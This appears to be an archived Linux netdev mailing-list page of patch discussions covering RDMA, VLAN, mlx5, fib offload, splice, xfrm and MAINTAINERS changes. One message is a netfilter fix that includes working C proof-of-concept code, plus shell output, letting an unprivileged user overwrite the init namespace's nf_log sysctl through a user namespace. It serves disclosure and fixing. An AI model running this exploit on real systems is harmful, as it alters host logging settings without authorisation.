> > > > On Sun, Sep 11, 2016 at 09:49:19PM -0700, Adit Ranadive wrote:
> > > > > +
> > > > > +static int pvrdma_poll_one(struct pvrdma_cq *cq, struct pvrdma_qp
> > > > **cur_qp,
> > > > > +			   struct ib_wc *wc)
> > > > > +{
> > > > > +	struct pvrdma_dev *dev = to_vdev(cq->ibcq.device);
> > > > > +	int has_data;
> > > > > +	unsigned int head;
> > > > > +	bool tried = false;
> > > > > +	struct pvrdma_cqe *cqe;
> > > > > +
> > > > > +retry:
> > > > > +	has_data = pvrdma_idx_ring_has_data(&cq->ring_state->rx,
> > > > > +					    cq->ibcq.cqe, &head);
> > > > > +	if (has_data == 0) {
> > > > > +		if (tried)
> > > > > +			return -EAGAIN;
> > > > > +
> > > > > +		/* Pass down POLL to give physical HCA a chance to poll. */
> > > > > +		pvrdma_write_uar_cq(dev, cq->cq_handle |
> > > > PVRDMA_UAR_CQ_POLL);
> > > > > +
> > > > > +		tried = true;
> > > > > +		goto retry;
> > > > > +	} else if (has_data == PVRDMA_INVALID_IDX) {
> > > >
> > > > I didn't went throw the entire life cycle of RX-ring's head and tail but you
> > > > need to make sure that PVRDMA_INVALID_IDX error is recoverable one, i.e
> > > > there is probability that in the next call to pvrdma_poll_one it will be fine.
> > > > Otherwise it is an endless loop.
> > >
> > > We have never run into this issue internally but I don't think we can recover here
> >
> > I briefly reviewed the life cycle of RX-ring's head and tail and didn't
> > caught any suspicious place that might corrupt it.
> > So glad to see that you never encountered this case.
> >
> > > in the driver. The only way to recover would be to destroy and recreate the CQ
> > > which we shouldn't do since it could be used by multiple QPs.
> >
> > Agree.
> > But don't they hit the same problem too?
> >
> > > We don't have a way yet to recover in the device. Once we add that this check
> > > should go away.
> >
> > To be honest i have no idea how to do that - i was expecting driver's vendors
> > to come up with an ideas :)
> > I once came up with an idea to force restart of the driver but it was
> > rejected.
> >
> > >
> > > The reason I returned an error value from poll_cq in v3 was to break the possible
> > > loop so that it might give clients a chance to recover. But since poll_cq is not expected
> > > to fail I just log the device error here. I can revert to that version if you want to break
> > > the possible loop.
> >
> > Clients (ULPs) cannot recover from this case. They even do not check the
> > reason of the error and treats any error as -EAGAIN.
> 
> It is because poll_one is not expected to fall.

Poll_one is an internal function in our driver. ULPs should still be okay I think as long as poll_cq
does not fail, no?

^ permalink raw reply

* Re: [PATCH] net: skbuff: Fix length validation in skb_vlan_pop()
From: pravin shelar @ 2016-09-18 20:26 UTC (permalink / raw)
  To: Shmulik Ladkani
  Cc: Jiri Pirko, David S . Miller, Linux Kernel Network Developers
In-Reply-To: <1474193358-20133-1-git-send-email-shmulik.ladkani@gmail.com>

On Sun, Sep 18, 2016 at 3:09 AM, Shmulik Ladkani
<shmulik.ladkani@gmail.com> wrote:
> In 93515d53b1
>   "net: move vlan pop/push functions into common code"
> skb_vlan_pop was moved from its private location in openvswitch to
> skbuff common code.
>
> In case !vlan_tx_tag_present, the original 'pop_vlan()' assured
> that skb->len is sufficient for the existence of a vlan_ethhdr
> (if skb->len < VLAN_ETH_HLEN then pop was a no-op).
>
> This validation was moved as is into the new common 'skb_vlan_pop'.
>
> Alas, in its original location (openvswitch), there's a guarantee that
> 'data' points to the mac_header, therefore the 'skb->len < VLAN_ETH_HLEN'
> condition made sense.
> However there's no such guarantee in the generic 'skb_vlan_pop'.
>
> For short packets received in rx path going through 'skb_vlan_pop',
> this causes 'skb_vlan_pop' to fail pop-ing a valid vlan hdr (in case tag
> is in payload), or to fail moving next tag into hw-accel tag.
>
> Instead, verify that 'skb->mac_len' is sufficient.
>
> Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
> ---
>  Spotted by code review while doing work augmenting tc act vlan.
>
>  net/core/skbuff.c | 4 ++--
>  1 file changed, 2 insertions(+), 2 deletions(-)
>
> diff --git a/net/core/skbuff.c b/net/core/skbuff.c
> index 1e329d4112..cc2c004838 100644
> --- a/net/core/skbuff.c
> +++ b/net/core/skbuff.c
> @@ -4537,7 +4537,7 @@ int skb_vlan_pop(struct sk_buff *skb)
>         } else {
>                 if (unlikely((skb->protocol != htons(ETH_P_8021Q) &&
>                               skb->protocol != htons(ETH_P_8021AD)) ||
> -                            skb->len < VLAN_ETH_HLEN))
> +                            skb->mac_len < VLAN_ETH_HLEN))

There is already check in __skb_vlan_pop() to validate skb for a vlan
header. So it is safe to drop this check entirely.

^ permalink raw reply

* Re: [PATCH net 1/3] net/mlx5: Fix flow counter bulk command out mailbox allocation
From: Or Gerlitz @ 2016-09-18 20:24 UTC (permalink / raw)
  To: Leon Romanovsky, Amir Vadai
  Cc: David S. Miller, Linux Netdev List, Tariq Toukan, Hadar Har-Zion,
	Roi Dayan, Or Gerlitz
In-Reply-To: <20160918180223.GM2923@leon.nu>

On Sun, Sep 18, 2016 at 9:02 PM, Leon Romanovsky <leon@kernel.org> wrote:
> On Sun, Sep 18, 2016 at 06:20:27PM +0300, Or Gerlitz wrote:
>> From: Roi Dayan <roid@mellanox.com>

>> @@ -425,11 +425,11 @@ struct mlx5_cmd_fc_bulk *
>>  mlx5_cmd_fc_bulk_alloc(struct mlx5_core_dev *dev, u16 id, int num)
>>  {
>>       struct mlx5_cmd_fc_bulk *b;
>> -     int outlen = sizeof(*b) +
>> +     int outlen =
>>               MLX5_ST_SZ_BYTES(query_flow_counter_out) +
>>               MLX5_ST_SZ_BYTES(traffic_counter) * num;
>>
>> -     b = kzalloc(outlen, GFP_KERNEL);
>> +     b = kzalloc(sizeof(*b) + outlen, GFP_KERNEL);
>>       if (!b)
>>               return NULL;

>                   ^^^^^^^^^ very controversial decision.
> The code flow mlx5_fc_stats_query->mlx5_cmd_fc_bulk_alloc->kzalloc
> failure is the same for success scenario too.

Sure, we will look on your comment and if needed come up with a
cleanup patch for net-next (4.9)

> It is not related to the proposed patch.

Correct, the proposed patch fixes a memory corruption that we want to
sort out for net (4.8)

Or.

^ permalink raw reply

* Re: skb_splice_bits() and large chunks in pipe (was Re: xfs_file_splice_read: possible circular locking dependency detected
From: Linus Torvalds @ 2016-09-18 20:12 UTC (permalink / raw)
  To: Al Viro
  Cc: Jens Axboe, Nick Piggin, linux-fsdevel, Network Development,
	Eric Dumazet
In-Reply-To: <20160918193112.GF2356@ZenIV.linux.org.uk>

On Sun, Sep 18, 2016 at 12:31 PM, Al Viro <viro@zeniv.linux.org.uk> wrote:
> FWIW, I'm not sure if skb_splice_bits() can't land us in trouble; fragments
> might come from compound pages and I'm not entirely convinced that we won't
> end up with coalesced fragments putting more than PAGE_SIZE into a single
> pipe_buffer.  And that could badly confuse a bunch of code.

The pipe buffer code is actually *supposed* to handle any size
allocations at all. They should *not* be limited by pages, exactly
because the data can come from huge-pages or just multi-page
allocations. It's definitely possible with networking, and networking
is one of the *primary* targets of splice in many ways.

So if the splice code ends up being confused by "this is not just
inside a single page", then the splice code is buggy, I think.

Why would splice_write() cases be confused anyway? A filesystem needs
to be able to handle the case of "this needs to be split" regardless,
since even if the source buffer were to fit in a page, the offset
might obviously mean that the target won't fit in a page.

Now, if you decide that you want to make the iterator always split
those possibly big cases and never have big iovec entries, I guess
that would potentially be ok. But my initial reaction is that they are
perfectly normal and should be handled normally, and any code that
depends on a splice buffer fitting in one page is just buggy and
should be fixed.

                 Linus

^ permalink raw reply

* Re: [patch net-next RFC 0/2] fib4 offload: notifier to let hw to be aware of all prefixes
From: Florian Fainelli @ 2016-09-18 20:00 UTC (permalink / raw)
  To: Jiri Pirko, netdev
  Cc: davem, idosch, eladr, yotamg, nogahf, ogerlitz, roopa, nikolay,
	linville, tgraf, gospo, sfeldma, ast, edumazet, hannes, dsa, jhs,
	vivien.didelot, john.fastabend, andrew, ivecera
In-Reply-To: <1473163300-2045-1-git-send-email-jiri@resnulli.us>

Le 06/09/2016 à 05:01, Jiri Pirko a écrit :
> From: Jiri Pirko <jiri@mellanox.com>
> 
> This is RFC, unfinished. I came across some issues in the process so I would
> like to share those and restart the fib offload discussion in order to make it
> really usable.
> 
> So the goal of this patchset is to allow driver to propagate all prefixes
> configured in kernel down HW. This is necessary for routing to work
> as expected. If we don't do that HW might forward prefixes known to kernel
> incorrectly. Take an example when default route is set in switch HW and there
> is an IP address set on a management (non-switch) port.
> 
> Currently, only fibs related to the switch port netdev are offloaded using
> switchdev ops. This model is not extendable so the first patch introduces
> a replacement: notifier to propagate fib additions and removals to whoever
> interested. The second patch makes mlxsw to adopt this new way, registering
> one notifier block for each mlxsw (asic) instance.

Instead of introducing another specialization of a notifier_block
implementation, could we somehow have a kernel-based netlink listener
which receives the same kind of event information from rtmsg_fib()?

The reason is that having such a facility would hook directly onto
existing rtmsg_* calls that exist throughout the stack, and that seems
to scale better.
-- 
Florian

^ permalink raw reply

* Re: [iproute PATCH] tc: don't accept qdisc 'handle' greater than ffff
From: Phil Sutter @ 2016-09-18 19:47 UTC (permalink / raw)
  To: Davide Caratti; +Cc: netdev, Stephen Hemminger, Hangbin Liu
In-Reply-To: <bdc0d8e58be9344b44fcd64a56b5b62004c108a1.1473930575.git.dcaratti@redhat.com>

On Fri, Sep 16, 2016 at 10:30:00AM +0200, Davide Caratti wrote:
> since get_qdisc_handle() truncates the input value to 16 bit, return an
> error and prompt "invalid qdisc ID" in case input 'handle' parameter needs
> more than 16 bit to be stored.
> 
> Signed-off-by: Davide Caratti <dcaratti@redhat.com>

Acked-by: Phil Sutter <phil@nwl.cc>

^ permalink raw reply

* [PATCH] netfilter: fix namespace handling in nf_log_proc_dostring
From: Jann Horn @ 2016-09-18 19:40 UTC (permalink / raw)
  To: Pablo Neira Ayuso, Patrick McHardy, Jozsef Kadlecsik,
	David S. Miller
  Cc: netfilter-devel, netdev, security

nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

char child_stack[1000000];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
        int fd = open(path, O_WRONLY);
        if (fd == -1)
                err(1, "unable to open thing");
        if (write(fd, buf, strlen(buf)) != strlen(buf))
                err(1, "unable to write thing");
        close(fd);
}

int child_fn(void *p_) {
        if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                  NULL))
                err(1, "mount");

        /* Yes, we need to set the maps for the net sysctls to recognize us
         * as namespace root.
         */
        char buf[1000];
        sprintf(buf, "0 %d 1\n", (int)outer_uid);
        writefile("/proc/1/uid_map", buf);
        writefile("/proc/1/setgroups", "deny");
        sprintf(buf, "0 %d 1\n", (int)outer_gid);
        writefile("/proc/1/gid_map", buf);

        stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
        if (stolen_fd == -1)
                err(1, "open nf_log");
        return 0;
}

int main(void) {
        outer_uid = getuid();
        outer_gid = getgid();

        int child = clone(child_fn, child_stack + sizeof(child_stack),
                          CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                          |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
        if (child == -1)
                err(1, "clone");
        int status;
        if (wait(&status) != child)
                err(1, "wait");
        if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                errx(1, "child exit status bad");

        char *data = "NONE";
        if (write(stolen_fd, data, strlen(data)) != strlen(data))
                err(1, "write");
        return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn <jann@thejh.net>
---
 net/netfilter/nf_log.c | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c
index aa5847a..1df2c8d 100644
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -420,7 +420,7 @@ static int nf_log_proc_dostring(struct ctl_table *table, int write,
 	char buf[NFLOGGER_NAME_LEN];
 	int r = 0;
 	int tindex = (unsigned long)table->extra1;
-	struct net *net = current->nsproxy->net_ns;
+	struct net *net = table->extra2;
 
 	if (write) {
 		struct ctl_table tmp = *table;
@@ -474,7 +474,6 @@ static int netfilter_log_sysctl_init(struct net *net)
 				 3, "%d", i);
 			nf_log_sysctl_table[i].procname	=
 				nf_log_sysctl_fnames[i];
-			nf_log_sysctl_table[i].data = NULL;
 			nf_log_sysctl_table[i].maxlen = NFLOGGER_NAME_LEN;
 			nf_log_sysctl_table[i].mode = 0644;
 			nf_log_sysctl_table[i].proc_handler =
@@ -484,6 +483,9 @@ static int netfilter_log_sysctl_init(struct net *net)
 		}
 	}
 
+	for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
+		table[i].extra2 = net;
+
 	net->nf.nf_log_dir_header = register_net_sysctl(net,
 						"net/netfilter/nf_log",
 						table);
-- 
2.1.4

^ permalink raw reply related

* Re: [PATCH net-next 2/2] net/sched: act_vlan: Introduce TCA_VLAN_ACT_MODIFY vlan action
From: Jamal Hadi Salim @ 2016-09-18 19:41 UTC (permalink / raw)
  To: Shmulik Ladkani, David S . Miller; +Cc: Jiri Pirko, netdev
In-Reply-To: <1474209225-23665-3-git-send-email-shmulik.ladkani@gmail.com>

On 16-09-18 10:33 AM, Shmulik Ladkani wrote:
> TCA_VLAN_ACT_MODIFY allows one to change an existing tag.
>
> It accepts same attributes as TCA_VLAN_ACT_PUSH (protocol, id,
> priority).
> If packet is vlan tagged, then the tag gets overwritten according to
> user specified attributes.
>
> For example, this allows user to replace a tag's vid while preserving
> its priority bits (as opposed to "action vlan pop pipe action vlan push").
>
> Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
> ---
>  include/uapi/linux/tc_act/tc_vlan.h |  1 +
>  net/sched/act_vlan.c                | 29 ++++++++++++++++++++++++++++-
>  2 files changed, 29 insertions(+), 1 deletion(-)
>
> diff --git a/include/uapi/linux/tc_act/tc_vlan.h b/include/uapi/linux/tc_act/tc_vlan.h
> index be72b6e384..bddb272b84 100644
> --- a/include/uapi/linux/tc_act/tc_vlan.h
> +++ b/include/uapi/linux/tc_act/tc_vlan.h
> @@ -16,6 +16,7 @@
>
>  #define TCA_VLAN_ACT_POP	1
>  #define TCA_VLAN_ACT_PUSH	2
> +#define TCA_VLAN_ACT_MODIFY	3
>
>  struct tc_vlan {
>  	tc_gen;
> diff --git a/net/sched/act_vlan.c b/net/sched/act_vlan.c
> index 59a8d3150a..e5eeaa7a01 100644
> --- a/net/sched/act_vlan.c
> +++ b/net/sched/act_vlan.c
> @@ -30,6 +30,7 @@ static int tcf_vlan(struct sk_buff *skb, const struct tc_action *a,
>  	struct tcf_vlan *v = to_vlan(a);
>  	int action;
>  	int err;
> +	u16 tci;
>
>  	spin_lock(&v->tcf_lock);
>  	tcf_lastuse_update(&v->tcf_tm);
> @@ -48,6 +49,30 @@ static int tcf_vlan(struct sk_buff *skb, const struct tc_action *a,
>  		if (err)
>  			goto drop;
>  		break;
> +	case TCA_VLAN_ACT_MODIFY:
> +		if (!skb_vlan_tagged(skb))
> +			goto unlock;
> +		/* extract existing tag (and guarantee no hwaccel tag) */
> +		if (skb_vlan_tag_present(skb)) {
> +			tci = skb_vlan_tag_get(skb);
> +			skb->vlan_tci = 0;
> +		} else {
> +			if (skb->mac_len < VLAN_ETH_HLEN)
> +				goto unlock;
> +			err = __skb_vlan_pop(skb, &tci);
> +			if (err)
> +				goto drop;
> +		}
> +		/* replace the vid */
> +		tci = (tci & ~VLAN_VID_MASK) | v->tcfv_push_vid;
> +		/* replace prio bits, if tcfv_push_prio specified */
> +		if (v->tcfv_push_prio) {
> +			tci &= ~VLAN_PRIO_MASK;
> +			tci |= v->tcfv_push_prio << VLAN_PRIO_SHIFT;
> +		}
> +		/* put updated tci as hwaccel tag */
> +		__vlan_hwaccel_put_tag(skb, v->tcfv_push_proto, tci);
> +		break;
>  	default:
>  		BUG();
>  	}
> @@ -102,6 +127,7 @@ static int tcf_vlan_init(struct net *net, struct nlattr *nla,
>  	case TCA_VLAN_ACT_POP:
>  		break;
>  	case TCA_VLAN_ACT_PUSH:
> +	case TCA_VLAN_ACT_MODIFY:
>  		if (!tb[TCA_VLAN_PUSH_VLAN_ID]) {
>  			if (exists)
>  				tcf_hash_release(*a, bind);
> @@ -185,7 +211,8 @@ static int tcf_vlan_dump(struct sk_buff *skb, struct tc_action *a,
>  	if (nla_put(skb, TCA_VLAN_PARMS, sizeof(opt), &opt))
>  		goto nla_put_failure;
>
> -	if (v->tcfv_action == TCA_VLAN_ACT_PUSH &&
> +	if ((v->tcfv_action == TCA_VLAN_ACT_PUSH ||
> +	     v->tcfv_action == TCA_VLAN_ACT_MODIFY) &&
>  	    (nla_put_u16(skb, TCA_VLAN_PUSH_VLAN_ID, v->tcfv_push_vid) ||
>  	     nla_put_be16(skb, TCA_VLAN_PUSH_VLAN_PROTOCOL,
>  			  v->tcfv_push_proto) ||
>


Nice. If you didnt do it I would have ;->

Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>

cheers,
jamal

^ permalink raw reply

* skb_splice_bits() and large chunks in pipe (was Re: xfs_file_splice_read: possible circular locking dependency detected
From: Al Viro @ 2016-09-18 19:31 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Jens Axboe, Nick Piggin, linux-fsdevel, netdev, Eric Dumazet
In-Reply-To: <20160917190023.GA8039@ZenIV.linux.org.uk>

FWIW, I'm not sure if skb_splice_bits() can't land us in trouble; fragments
might come from compound pages and I'm not entirely convinced that we won't
end up with coalesced fragments putting more than PAGE_SIZE into a single
pipe_buffer.  And that could badly confuse a bunch of code.

Can that legitimately happen?  If so, we'll need to audit quite a few
->splice_write()-related codepaths; FUSE, in particular, is very likely
to be unhappy with that kind of stuff, and it's not the only place where
we might count upon never seeing e.g. longer than PAGE_SIZE chunks in
bio_vec.  It shouldn't be all that hard to fix, but if the whole thing
is simply impossible, I would rather avoid that round of RTFS at the moment...

Comments?

^ permalink raw reply

* [PATCH v2 net-next] MAINTAINERS: Add an entry for the core network DSA code
From: Andrew Lunn @ 2016-09-18 19:17 UTC (permalink / raw)
  To: David Miller; +Cc: Florian Fainelli, Vivien Didelot, netdev, Andrew Lunn

The core distributed switch architecture code currently does not have
a MAINTAINERS entry, which results in some contributions not landing
in the right peoples inbox.

Signed-off-by: Andrew Lunn <andrew@lunn.ch>
---
v2: Add include/net/dsa.h and drivers/net/dsa/

 MAINTAINERS | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/MAINTAINERS b/MAINTAINERS
index ce80b36aab69..8c8a2e40bdbb 100644
--- a/MAINTAINERS
+++ b/MAINTAINERS
@@ -8169,6 +8169,15 @@ S:	Maintained
 W:	https://fedorahosted.org/dropwatch/
 F:	net/core/drop_monitor.c
 
+NETWORKING [DSA]
+M:	Andrew Lunn <andrew@lunn.ch>
+M:	Vivien Didelot <vivien.didelot@savoirfairelinux.com>
+M:	Florian Fainelli <f.fainelli@gmail.com>
+S:	Maintained
+F:	net/dsa/
+F:	include/net/dsa.h
+F:	drivers/net/dsa/
+
 NETWORKING [GENERAL]
 M:	"David S. Miller" <davem@davemloft.net>
 L:	netdev@vger.kernel.org
-- 
2.9.3

^ permalink raw reply related

* Re: [PATCH net-next 2/3] r8152: support ECM mode
From: kbuild test robot @ 2016-09-18 18:37 UTC (permalink / raw)
  To: Hayes Wang
  Cc: kbuild-all-JC7UmRfGjtg, netdev-u79uwXL29TY76Z2rM5mHXA,
	nic_swsd-Rasf1IRRPZFBDgjK7y7TUQ,
	linux-kernel-u79uwXL29TY76Z2rM5mHXA,
	linux-usb-u79uwXL29TY76Z2rM5mHXA, Hayes Wang
In-Reply-To: <1394712342-15778-217-Taiwan-albertk-Rasf1IRRPZFBDgjK7y7TUQ@public.gmane.org>

[-- Attachment #1: Type: text/plain, Size: 2088 bytes --]

Hi Hayes,

[auto build test ERROR on net-next/master]

url:    https://github.com/0day-ci/linux/commits/Hayes-Wang/r8152-configuration-setting/20160907-192351
config: i386-randconfig-x0-09182136 (attached as .config)
compiler: gcc-6 (Debian 6.2.0-3) 6.2.0 20160901
reproduce:
        # save the attached .config to linux build tree
        make ARCH=i386 

All errors (new ones prefixed by >>):

   drivers/built-in.o: In function `r815x_mdio_write':
>> r8152.c:(.text+0x19a664): undefined reference to `usbnet_write_cmd'
   drivers/built-in.o: In function `r815x_mdio_read':
>> r8152.c:(.text+0x19a6ae): undefined reference to `usbnet_read_cmd'
   drivers/built-in.o: In function `rtl_usbnet_disconnect':
>> r8152.c:(.text+0x19aaa9): undefined reference to `usbnet_disconnect'
   drivers/built-in.o: In function `rtl_ecm_bind':
>> r8152.c:(.text+0x19c143): undefined reference to `usbnet_cdc_bind'
   r8152.c:(.text+0x19c175): undefined reference to `usbnet_write_cmd'
>> r8152.c:(.text+0x19c1e8): undefined reference to `usbnet_cdc_unbind'
   drivers/built-in.o: In function `rtl_usbnet_suspend':
>> r8152.c:(.text+0x19d3ab): undefined reference to `usbnet_suspend'
   drivers/built-in.o: In function `rtl_usbnet_probe':
>> r8152.c:(.text+0x19d7bd): undefined reference to `usbnet_probe'
   drivers/built-in.o: In function `rtl_usbnet_reset_resume':
>> r8152.c:(.text+0x19ec33): undefined reference to `usbnet_resume'
   drivers/built-in.o: In function `rtl_usbnet_resume':
   r8152.c:(.text+0x19ec68): undefined reference to `usbnet_resume'
   drivers/built-in.o: In function `lkdtm_rodata_do_nothing':
>> (.rodata+0x3538c): undefined reference to `usbnet_cdc_unbind'
   drivers/built-in.o: In function `lkdtm_rodata_do_nothing':
>> (.rodata+0x3539c): undefined reference to `usbnet_manage_power'
   drivers/built-in.o: In function `lkdtm_rodata_do_nothing':
>> (.rodata+0x353a0): undefined reference to `usbnet_cdc_status'

---
0-DAY kernel test infrastructure                Open Source Technology Center
https://lists.01.org/pipermail/kbuild-all                   Intel Corporation

[-- Attachment #2: .config.gz --]
[-- Type: application/gzip, Size: 30778 bytes --]

^ permalink raw reply

* Re: [PATCH net 1/3] net/mlx5: Fix flow counter bulk command out mailbox allocation
From: Leon Romanovsky @ 2016-09-18 18:02 UTC (permalink / raw)
  To: Or Gerlitz
  Cc: David S. Miller, netdev, Tariq Toukan, Hadar Har-Zion, Amir Vadai,
	Roi Dayan
In-Reply-To: <1474212029-1052-2-git-send-email-ogerlitz@mellanox.com>

[-- Attachment #1: Type: text/plain, Size: 1648 bytes --]

On Sun, Sep 18, 2016 at 06:20:27PM +0300, Or Gerlitz wrote:
> From: Roi Dayan <roid@mellanox.com>
>
> The FW command output length should be only the length of struct
> mlx5_cmd_fc_bulk out field. Failing to do so will cause the memcpy
> call which is invoked later in the driver to write over wrong memory
> address and corrupt kernel memory which results in random crashes.
>
> This bug was found using the kernel address sanitizer (kasan).
>
> Fixes: a351a1b03bf1 ('net/mlx5: Introduce bulk reading of flow counters')
> Signed-off-by: Roi Dayan <roid@mellanox.com>
> Signed-off-by: Or Gerlitz <ogerlitz@mellanox.com>
> ---
>  drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c | 4 ++--
>  1 file changed, 2 insertions(+), 2 deletions(-)
>
> diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
> index 9134010..287ade1 100644
> --- a/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
> +++ b/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
> @@ -425,11 +425,11 @@ struct mlx5_cmd_fc_bulk *
>  mlx5_cmd_fc_bulk_alloc(struct mlx5_core_dev *dev, u16 id, int num)
>  {
>  	struct mlx5_cmd_fc_bulk *b;
> -	int outlen = sizeof(*b) +
> +	int outlen =
>  		MLX5_ST_SZ_BYTES(query_flow_counter_out) +
>  		MLX5_ST_SZ_BYTES(traffic_counter) * num;
>
> -	b = kzalloc(outlen, GFP_KERNEL);
> +	b = kzalloc(sizeof(*b) + outlen, GFP_KERNEL);
>  	if (!b)
>  		return NULL;
                  ^^^^^^^^^ very controversial decision.
The code flow mlx5_fc_stats_query->mlx5_cmd_fc_bulk_alloc->kzalloc
failure is the same for success scenario too.

It is not related to the proposed patch.

>
> --
> 2.3.7
>

[-- Attachment #2: signature.asc --]
[-- Type: application/pgp-signature, Size: 819 bytes --]

^ permalink raw reply

* Re: [PATCH iproute2] vxlan: allow specifying multiple default destinations
From: Tomasz Chmielewski @ 2016-09-18 17:41 UTC (permalink / raw)
  To: netdev

> Signed-off-by: Mike Rapoport <mike.rapoport@ravellosystems.com>
> ---
> This patch depends on the pending changes to ip/iplink_vxlan.c as as
> well as on IPv6 support in vxlan. I'll rebase and resend it once all
> the changes to vxlan are merged.

Was this one (and related) ever merged?

Full thread here:

http://marc.info/?t=136688790500006&r=1&w=4



Tomasz Chmielewski
https://lxadm.com

^ permalink raw reply

* Re: [PATCH net] xfrm: Fix memory leak of aead algorithm name
From: Rami Rosen @ 2016-09-18 17:39 UTC (permalink / raw)
  To: Ilan Tayari; +Cc: Steffen Klassert, Herbert Xu, netdev@vger.kernel.org
In-Reply-To: <AM4PR0501MB19404B000E4D3A2CF3CB80DEDBF50@AM4PR0501MB1940.eurprd05.prod.outlook.com>

Acked-by: Rami Rosen <roszenrami@gmail.com>

On 18 September 2016 at 10:42, Ilan Tayari <ilant@mellanox.com> wrote:
> commit 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
> introduced aead. The function attach_aead kmemdup()s the algorithm
> name during xfrm_state_construct().
> However this memory is never freed.
> Implementation has since been slightly modified in
> commit ee5c23176fcc ("xfrm: Clone states properly on migration")
> without resolving this leak.
> This patch adds a kfree() call for the aead algorithm name.
>
> Fixes: 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
> Signed-off-by: Ilan Tayari <ilant@mellanox.com>
> ---
>  net/xfrm/xfrm_state.c | 1 +
>  1 file changed, 1 insertion(+)
>
> diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c
> index 9895a8c..a30f898d 100644
> --- a/net/xfrm/xfrm_state.c
> +++ b/net/xfrm/xfrm_state.c
> @@ -332,6 +332,7 @@ static void xfrm_state_gc_destroy(struct xfrm_state *x)
>  {
>         tasklet_hrtimer_cancel(&x->mtimer);
>         del_timer_sync(&x->rtimer);
> +       kfree(x->aead);
>         kfree(x->aalg);
>         kfree(x->ealg);
>         kfree(x->calg);
> --
> 1.8.3.1
>

^ permalink raw reply

* Re: [net-next PATCH v3 2/3] e1000: add initial XDP support
From: Jesper Dangaard Brouer @ 2016-09-18 17:25 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Alexei Starovoitov, John Fastabend, bblanco, jeffrey.t.kirsher,
	davem, xiyou.wangcong, intel-wired-lan, u9012063, netdev, brouer
In-Reply-To: <1473723968.18970.111.camel@edumazet-glaptop3.roam.corp.google.com>

On Mon, 12 Sep 2016 16:46:08 -0700
Eric Dumazet <eric.dumazet@gmail.com> wrote:

> This XDP_TX thing was one of the XDP marketing stuff, but there is
> absolutely no documentation on it, warning users about possible
> limitations/outcomes.

I will take care of documentation for the XDP project.

-- 
Best regards,
  Jesper Dangaard Brouer
  MSc.CS, Principal Kernel Engineer at Red Hat
  Author of http://www.iptv-analyzer.org
  LinkedIn: http://www.linkedin.com/in/brouer

^ permalink raw reply

* [PATCH net] xfrm: Fix memory leak of aead algorithm name
From: Ilan Tayari @ 2016-09-18  7:42 UTC (permalink / raw)
  To: Steffen Klassert, Herbert Xu; +Cc: netdev@vger.kernel.org

commit 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
introduced aead. The function attach_aead kmemdup()s the algorithm
name during xfrm_state_construct().
However this memory is never freed.
Implementation has since been slightly modified in
commit ee5c23176fcc ("xfrm: Clone states properly on migration")
without resolving this leak.
This patch adds a kfree() call for the aead algorithm name.

Fixes: 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
Signed-off-by: Ilan Tayari <ilant@mellanox.com>
---
 net/xfrm/xfrm_state.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c
index 9895a8c..a30f898d 100644
--- a/net/xfrm/xfrm_state.c
+++ b/net/xfrm/xfrm_state.c
@@ -332,6 +332,7 @@ static void xfrm_state_gc_destroy(struct xfrm_state *x)
 {
 	tasklet_hrtimer_cancel(&x->mtimer);
 	del_timer_sync(&x->rtimer);
+	kfree(x->aead);
 	kfree(x->aalg);
 	kfree(x->ealg);
 	kfree(x->calg);
-- 
1.8.3.1

^ permalink raw reply related

* Re: [PATCH v4 09/16] IB/pvrdma: Add support for Completion Queues
From: Leon Romanovsky @ 2016-09-18 17:07 UTC (permalink / raw)
  To: Yuval Shaia
  Cc: Adit Ranadive, dledford@redhat.com, linux-rdma@vger.kernel.org,
	pv-drivers, netdev@vger.kernel.org, linux-pci@vger.kernel.org,
	Jorgen S. Hansen, Aditya Sarwade, George Zhang, Bryan Tan
In-Reply-To: <20160915073611.GA3851@yuval-lap.uk.oracle.com>

[-- Attachment #1: Type: text/plain, Size: 3004 bytes --]

On Thu, Sep 15, 2016 at 10:36:12AM +0300, Yuval Shaia wrote:
> Hi Adit,
> Please see my comments inline.
>
> Besides that I have no more comment for this patch.
>
